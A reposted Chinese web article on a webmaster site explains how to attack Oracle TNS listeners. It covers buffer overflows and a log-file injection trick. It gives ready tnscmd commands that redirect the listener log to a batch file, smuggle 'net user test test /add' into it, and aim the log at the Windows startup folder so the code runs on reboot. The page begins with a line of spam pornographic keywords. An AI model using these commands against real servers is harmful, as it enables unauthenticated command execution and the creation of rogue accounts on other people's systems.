亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 安全教程 查看內容

針對Oracle的TNS listener的攻擊方法

2022-9-24 10:21| 查看: 2444 |來源: 互聯網

首先,根據版本的不同,TNS listener可能較易受到多種類型的緩沖區(qū)溢出攻擊,這些攻擊可以在不提供用戶ID和口令的情況下被利用。例如:在oracle 9i中,當客戶機 ...

首先,根據版本的不同,TNS listener可能較易受到多種類型的緩沖區(qū)溢出攻擊,這些攻擊可以在不提供用戶ID和口令的情況下被利用。例如:在oracle 9i中,當客戶機請求某個過長的service_name時,很容易受到溢出攻擊。當listener為日志構建錯誤消息之后,service_name的值會被復制到某于棧結構的緩沖區(qū)內,從而引起溢出—覆蓋保存值將返回棧中的地址。這種做法可以使攻擊者獲得控制權。事實上,TNS listener曾經有過多次溢出和格式化字符串的漏洞。

其次,另一類攻擊和日志文件有關。只有當未給listener設置口令的時候,攻擊才會有效。假設某個listener沒有設置口令,攻擊方法如下:

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))”  將日志目錄設置到C盤

tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))”  將日志文件設置為test.bat

tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=((     ||dir >test.txt||net user test test /add))”  該命令把dir >test.txt、net user test test /add命令寫入c:\test.bat文件,由于雙豎線的作用(第一條命令執(zhí)行失敗后,WINDOWS命令解釋器執(zhí)行后面的命令)把錯誤的信息注釋掉, 從而可以執(zhí)行我們提交的命令。

通過設置日志文件到不同的目錄,例如WINDOWS的啟動目錄,當服務器重啟將執(zhí)行惡意用戶提交的特定代碼,從而對系統造成威脅。

運行于UNIX系統上的oracle也會受到同樣的威脅。其中一種方法就是將“  ”回送給.rhost文件,當系統運行時,使用r*services命令。

tag標簽:Oracle 攻擊方法
本文最后更新于 2022-9-24 10:21,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創(chuàng)業(yè)、關注互聯網人 - 互聯網創(chuàng)業(yè)者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業(yè)用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創(chuàng)業(yè)者提供更加優(yōu)質的創(chuàng)業(yè)信息和品牌營銷服務,與站長一起進步!讓互聯網創(chuàng)業(yè)者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部